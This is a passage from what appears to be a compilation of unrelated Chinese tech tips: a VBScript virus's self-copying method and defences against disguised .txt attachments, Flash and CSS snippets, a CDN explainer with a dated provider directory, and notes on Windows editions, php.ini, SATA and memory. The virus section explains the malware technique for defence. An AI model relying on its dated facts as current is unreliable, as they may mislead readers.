就是这么两行就可以拷贝文件到指定地点。第一行是创建一个文件系统对象，第二行前面是打开这个脚本文件，c:windows winipcfg.exe指明是这个程序本身，是一个完整的路径文件名。GetFile函数获得这个文件，Copy函数将这个文件复制到e盘根目录下。这也是大多数利用VBscript编写的病毒的一个特点。从这里可以看出，禁止了FileSystemObject这个对象就可以很有效的控制这种病毒的传播。用regsvr32 scrrun.dll /u这条命令就可以禁止文件系统对象。


欺骗识别及防范方法：这种带有欺骗性质的. txt文件显示出来的并不是文本文件的图标，它显示的是未定义文件类型的标志，这是区分它与正常.txt文件的最好方法。识别的另一个办法是在“按WEB 页方式”查看时在“我的电脑”左面会显示出其文件名全称，此时可以看到它不是真正的txt文件。问题是很多初学者经验不够，老手也可能因为没留意而打开它，在这里再次提醒您，注意您收到的邮件中附件的文件名，不仅要看显示出来的扩展名，还要注意其实际显示的图标是什么。对于附件中别人发来的看起来是. txt的文件，可以将它下载后用鼠标右键选择“用记事本打开”，这样看会很安全。

来源:Ccidnet

如果你是指关闭swf所在的html：

程序代码

on (release) {
getURL("JavaScript:window.close('gmail.html')");
}

其中gmail.html是指你所要关闭并且你那swf所在的页面

如果你是指关闭flash的*.swf或者*.exe的文件：
在按钮上添加AS语句FSCommand，并在commands for standalone player里选择quit即可

例子

程序代码

on (release) {
fscommand("quit");
}

或者(以下是关闭全屏幕的flash)

程序代码

on (release) {
fscommand("fullscreen", "false");
}

这是div+css布局中经常会碰到的基础问题，个人觉得采用背景图填充的方法，还是比较简单和切实可行的。最终效果。

　　CSS源代码:

　　body {
　　background: #EDEDED;
　　font-size: 70%;
　　font-family: Arial, Helvetica, sans-serif;
　　line-height: 130%;
　　color: #666666;
　　margin: 0;
　　padding: 0;
　　text-align: center;
　　}

　　#layout {
　　width: 760px;/*--for ie5.x--*/
　　width: 740px;/*--other--*/
　　margin: 10px auto;
　　border: solid 10px #999999;
　　border-bottom: solid 9px #999999;
　　/*--底部要加个1px的DIV来清除浮动，所以把底边框设为9px--*/
　　background: url(bg.gif) #FFFFFF repeat-y left;
　　/*--背景填充，解决左右栏高度不一致--*/
　　text-align: left;
　　}

　　#sidel {
　　float: left;
　　width: 190px;
　　}

 
　　#sider {
　　float: right;
　　width: 540px;
　　}

　　pre {
　　padding: 10px;
　　margin: 0;
　　}

　　.clear {
　　background: #999999;
　　clear: both;
　　height: 1px;
　　overflow: hidden;
　　}

　　CDN，全称是Content Delivery Network，中文可译为"内容快递网"。它是一个建立并覆盖在互联网（Internet）之上的一层特殊网络，专门用于通过互联网高效传递丰富的多媒体内容。CDN 出现和存在的意义在于它使互联网更有效地为人们服务，特别是那些对互联网内容有更高要求（比如由简单的文字和图片等静态内容到声像俱全的多媒体动态内容）的人们。

“CDN技术”简介

　　CDN的全称是Content Delivery Network，即内容分发网络。其目的是通过在现有的Internet中增加一层新的网络架构，将网站的内容发布到最接近用户的网络”边缘”，使用户可以就近取得所需的内容，解决Internet网络拥挤的状况，提高用户访问网站的响应速度。从技术上全面解决由于网络带宽小、用户访问量大、网点分布不均等原因所造成的用户访问网站响应速度慢的问题。

　　目前，国内访问量较高的大型网站如新浪、网易等，均使用CDN网络加速技术，虽然网站的访问巨大，但无论在什么地方访问都会感觉速度很快。而一般的网站如果服务器在网通，电信用户访问很慢，如果服务器在电信，网通用户访问又很慢。

何谓“GCDN技术”？

　　在CDN技术出现之后，为了适应用户信息全球化的需求，号称“第二代CDN技术”的“Global CDN技术”诞生了。其基本原理还是跟CDN技术一样，但是其信息发布范围大大扩充了。

　　Global CDN(Global Content Delivery Network)全球网络加速器即内容分发网络，是构建在现有宽带IP网络之上的一层虚拟网络，其基本思想是，依靠放置在各地的缓存或媒体服务器，通过系统中心平台的智能负载均衡、内容分发、调度等功能模块，将用户最感兴趣的那部分媒体内容部署到最贴近用户的地方，使得原本无序、低效、不可靠的宽带IP网络转变成高效、可靠的智能网络，以满足用户对媒体访问质量的更高要求。

“CDN技术”的特点

　　1、本地Cache加速 提高了企业站点（尤其含有大量图片和静态页面站点）的访问速度，并大大提高以上性质站点的稳定性

　　2、镜像服务 消除了不同运营商之间互联的瓶颈造成的影响，实现了跨运营商的网络加速，保证不同网络中的用户都能得到良好的访问质量。

　　3、远程加速 远程访问用户根据DNS负载均衡技术 智能自动选择Cache服务器，选择最快的Cache服务器，加快远程访问的速度

　　4、带宽优化 自动生成服务器的远程Mirror（镜像）cache服务器，远程用户访问时从cache服务器上读取数据，减少远程访问的带宽、分担网络流量、减轻原站点WEB服务器负载等功能。

　　5、集群抗攻击 广泛分布的CDN节点加上节点之间的智能冗于机制，可以有效地预防黑客入侵以及降低各种D.D.o.S攻击对网站的影响，同时保证较好的服务质量 。

“CDN技术” 与 “镜像站点” 的区别

　　CDN有别于镜像，因为它比镜像更智能，或者可以做这样一个比喻：CDN＝更智能的镜像+缓存+流量导流。因而，CDN可以明显提高Internet网络中信息流动的效率。从技术上全面解决由于网络带宽小、用户访问量大、网点分布不均等问题，提高用户访问网站的响应速度。

CND业务的运营商推荐：

ChinaITLab为广大读者推荐的10个提供CDN业务的运营商如下：

　

公司	性质	特色
官方网站：蓝汛CDN（http://www.chinacache.com/） 公司名称：北京蓝汛通信技术有限责任公司 公司地址：北京市朝阳区酒仙桥中路10号星科大厦A座6层 联系电话：(86-10)64373399-220	类型： 核心运营商 评定： ★★★★★★	国内最大的CDN服务提供商 CDN加速
官方网站：网宿科技（http://www.chinanetcenter.com/） 公司名称：上海网宿科技发展有限公司（沪 B2-20030144） 公司地址：上海市漕河泾开发区田林路388号新业大厦9楼 联系电话：021-54902277	类型： 核心运营商 评定： ★★★★★★	拥有大量机房和带宽资源的大型IDC 专线接入 CDN加速
官方网站：有孚网络（http://idc.yovole.com/） 公司名称：上海有孚计算机网络有限公司 公司地址：上海市国定路335号2号楼19层 联系电话：800-708-0018（上海地区）+86-21-51263688	类型： 核心运营商 评定： ★★★★★☆	拥有大量机房和带宽资源的大型IDC 电子商务加速 CDN加速
官方网站：蓝芒科技（http://www.lanmang.com/） 公司名称：陕西蓝芒通信有限公司 公司地址：西安市南关正街1号泛美大厦2706 联系电话：029-87809350	类型： 重点运营商 评定： ★★★★★☆	厦门蓝芒科技西安分公司 CDN加速 硬件防火墙
官方网站：北京快网（http://www.fastweb.com.cn/） 公司名称：北京快网科技有限公司（浙B2-20040180） 公司地址：北京市八里桥南街16号京贸国际706室 联系电话：010-89506295	类型： 重点运营商 评定： ★★★★★☆	拥有大量机房和带宽资源的网站加速专家 CDN加速
官方网站：新世纪数据中心（http://www.21idc.com.cn/） 公司名称：厦门海盟科技有限公司 公司地址：厦门市厦禾路龙都大酒店（铁道大厦）13楼B座 联系电话：0592-5865800至5865820（共20线）	类型： 普通运营商 评定： ★★★★☆☆	全球CDN 海外主机 CDN加速
官方网站：商务中国（http://www.bizcn.com/） 公司名称：商务中国（闽B2-20040189） 公司地址：厦门软件园盛世大厦1-4楼（软件技术服务大楼裙楼） 联系电话：0592-2577888	类型： 核心运营商 评定： ★★★★★☆	国内域名、虚机业务几个核心运营商之一 CDN加速 数据备份
官方网站：数字引擎（http://www.idc2000.com/） 公司名称：厦门市数字引擎网络技术有限公司（闽B2-20050085） 公司地址：福建省厦门市嘉禾路388号永同昌大厦10E 联系电话：86-592-5583500 5583501	类型： 重点运营商 评定： ★★★★★☆	国内主要的虚机服务商之一 FastHTTP加速多线路3X3加速 数据库加速 双线多线 CDN加速
官方网站：世纪东方（http://www.51web.cn/） 公司名称：成都世纪东方网络通信有限公司(川B2-20030101号) 公司地址：成都市一环路南二段17号NOVA@世界资讯广场917-919 联系电话：028-85493600 85493603	类型： 普通运营商 评定： ★★★★★☆	国内较大的虚机运营商 CDN加速 黑洞DDOS
官方网站：百优科技（http://www.100u.com/） 公司名称：百优科技（闽B2-20050060） 公司地址：厦门市天湖路40号假日电子城1012 联系电话：晚上值班电话0592-8756558 0592-8229558 白天值班电话：0592-2207667 0592-2207669 0592-2296567	类型： 重点运营商 评定： ★★★★★☆	国内主要的虚机服务商之一 CDN加速

运营商分析：

　　·CDN的国内领航者：从2000年起, 北京蓝汛通信技术有限公司（http://www.chinacache.com/）在中国首家引入内容分发网络（CDN——Content Delivery Network）的概念和技术，投资构建了节点遍布全国的ChinaCache CDN系统，成为中国第一家独立的专业CDN服务提供商。ChinaCache也是目前国内唯一获得信息产业部批准从事CDN业务的公司。

　　目前，ChinaCache CDN的服务节点已在中国近30个主要城市开通运行，可服务的互联网用户超过全国总数的95%，总带宽资源超过8G， 很好地实现了不同地区用户访问量的负载均衡，优化了网络性能，提高了用户上网的访问效率。强大的技术力量和丰富的网络资源将使得ChinaCache可以为各ISP、ICP、企业网站和互联网最终用户提供包括静态内容、动态内容、流媒体内容以及数据库等多种网络内容分发与应用服务。

　　ChinaCache 提供的CDN产品与服务包括：ChinaCache HTTP静态内容CDN服务、ChinaCache MDN流媒体内容发布与加速以及增值CDN服务。

　　·网宿科技已经成为除电信运营商之外最大的专业IDC服务商。2004年初，在电信运营商进行整合后，互联网出现了南北互访缓慢的问题，这时网宿科技及时地推出了解决南北互通提高网站访问速度的CDN网站加速服务产品，如今CDN业务如火如荼的开展着，迅速得到了众多国内大型网站的认可，目前CDN服务已成为网宿科技的最新主推产品。

　　目前网宿科技(http://www.51cdn.com/)在全国八大区域部署有32个节点，遍布华东、华南、华中、西南、西北、华北、东北等地区，计划年底增加节点55个，整个CDN网络将覆盖全中国大陆地区。

　　网宿CDN提供：网页加速、动态内容加速、下载加速、流媒体点播加速、流媒体直播加速、CDN智能DNS服务、CDN地区广告服务、CDN快速传输服务。

    由于构建CDN系统需要大量的硬件资源和较高的技术实力，因此一般的运营商是无法自行建设CDN系统的，不少运营商都是与蓝汛合作以引入CDN业务。

    ·CDN＋虚拟主机：由于虚拟主机是IDC业务中非常热门和非常基础的一项服务，因此虚拟主机在不断的更新换代中也融入了CDN技术，国内不少大型的虚机服务商也都为自己的虚机系统加入了CDN技术，例如世纪东方（http://www.51web.cn/）和百优科技（http://www.100u.com/），这些运营商的虚机业务也深受广大站长欢迎。

    另外还有一些在本地区范围内具备一定影响力的公司也可以为用户提供 CDN 服务，如下：

Google adsense的广告中的小字体改好看了，研究了一下用的字体是：Pmingliu，大小：11px，之前在POCO站点的图上看到过这样的字

google ad中使用的：
font-family: Pmingliu,verdana,arial,sans-serif;font-size:11px

不过如果用GB2312或者GBK字符集的时候，你在测试的时候，用IE6看的时候，会发现还是有锯齿，狠难看，用firefox和IE7没事，只要把测试文件转成UTF-8格式就好

通常微软的操作系统有三种版本，这三种版本只是销售对象不一样，使用起来都一样。

(a)Retail.(零售版)：就是看到有漂亮包装的那种。可以升级安装，也可以全新安装。

(b)OEM.(随机版)：只能随机器出货，不能零售，所以叫做随机版。只能全新安装，不能从旧有操作系统升级。如果买笔记型计算机或品牌计算机就会有随机版软件。包装不像零售版精美，通常只有一面CD和说明书(授权书)。

(c)Upgrade(升级版)：包装和零售版一样，不过价格却便宜很多。只能升级安装，要全新安装的话，安装程序会检查旧有的操作系统光盘，检查过后就可以装了。

以上三种是市面上可以买到的，另外还有公司团体跟微软签约的版本。例如：MSDN.Select就是微软给MSDN(MS.Developer.Network)订户的版本，微软每一季会寄一箱光盘给MSDN订户，那堆光盘内容视你和微软合约内容而定。另外还有大量授权(Volume.License)版本。大量授权版本的WinXP不用激活，只需要序号。再补充一下，大家常常看到Beta,RC1,RTM这些字，是什么意思呢？

Beta：很容易理解就是测试版，这个阶段的版本会一直加入新的功能。

RC(Release.Candidate)：Candidate是候选人的意思，用在软件上就是候选版本。

Release.Candidate.就是发行候选版本。和Beta版最大的差别在于Beta阶段会一直加入新的功能，但是到了RC版本，几乎就不会加入新的功能了，而使着重于除错!

RTM(Release.to.Manufacturing)：Manufacturing是制造的意思。正式在零售商店上架前，是不是需要一段时间来压片，包装、配销呢?所以程序代码必须在正式发行前一段时间就要完成，这个完成的程序代码叫做Final.Code，这次Windows.XP开发完成，外国媒体用Windows
XP.goes.gold来称呼。程序代码开发完成之后，要将母片送到工厂大量压片，这个版本就叫做RTM版。所以说，RTM版的程序码一定和正式版一样。但是和正式版也有不一样的地方：例如正式版中的OEM不能升级安装，升级版要全新安装的话会检查旧版操作系统光盘等，这些就是RTM和正式版不同的地方，但是它们的主要程序代码都是一样的。

php.ini 或 php3.ini 是 PHP 在启动时会读取的配置文件。

该文件的存放路径为 /usr/local/lib/。在 PHP 3.x 版的配置文件为 php3.ini；而在 PHP 4.x 版改为 php.ini。若 PHP 安装成服务器的模块，则在 Web 服务器启动执行时会读取，之后就不再读取，因此改动配置的话要重新启动 Web 服务器。

[阅读全文]

　SATA的优势：支持热插拔 ，传输速度快，执行效率高

　Serial ATA也就是串行ATA，它与目前广泛采用的ATA/100或ATA/133等接口最根本的不同在于，以前硬盘所有的ATA接口类型都是采用并行方式进行数据通信，因而统称并行ATA。而Serial ATA，顾名思义，也就是采用串行方式（Serial ATA采用“序列式”的结构，把若干位（bit）数据打包，然后采用比并行式更高的速度（高50%），把数据分组形式传输至主机的方式）进行数据传输。

一、高速度

　　现行的ATA硬盘很少会用尽数据线所有的带宽。即使是ATA/133硬盘，也不会真正达到133MB/S的速率。最多也就只能达到60MB/S的稳定传输速率。所以一般情况下，并不会感觉到ATA/133和ATA/66的区别。而串行ATA1.0确立了150MB/S的标准，最终将实现600MB/S的传输速率，可谓一个质的飞跃。

二、可连接多台设备

　　由于Serial ATA 采用点对点的传输协议，所以不存在主/从问题，这样每个驱动器不仅能独享带宽，而且使拓展ATA设备更加便利。用户不需要再为设置硬盘主从跳线而苦恼只要增加通道数目，即可连接多台设备。
　　Serial ATA采用七针数据电缆，主要有四个针脚，第1针发送信号，第2针接收信号，第3针供应电源，第4针为地线。最长可以达到1米，而并行ATA最长40厘米，重要是不会在出现因过多的引脚而是针会变弯或断针的现象，Serial ATA插接简单，还大大改善了机箱的通风条件。

三、持热插拔

　　串行ATA支持热插拔，像USB和IEEE1394一样，在不关机的情况下就能完成增加或移除硬盘的工作，并且不会对硬盘和控制器造成损坏。

四、内置数据校验

　　在串行ATA在传输总线的两头都引入了全新的CRC（循环冗余校验）保护系统。串行ATA的双向CRC校验对一般家庭用户用处可能不大，但对于高端工作站和服务器来说却至关重要的。

串行ATA与并行ATA的技术特征及性能对比

　　电脑中有用来存储数据的部分称为存储部件，存储部件分为外存和内存两种。外存又叫辅助存储器，常见的设备有硬盘、软盘、CD-ROM等等；内存又叫主存，是用来存储执行中的数据,常见的有内存条、高速缓存等。

　　下图是内存的大体分类：

　　注释：
　　ROM（Read Only Memory）：只读存储器；
　　RAM（Random Access Memory）：随机存取存储器；
　　DRAM（Dynamic RAM）：动态随机存取存储器；
　　SRAM（Static RAM）：静态随机存取存储器。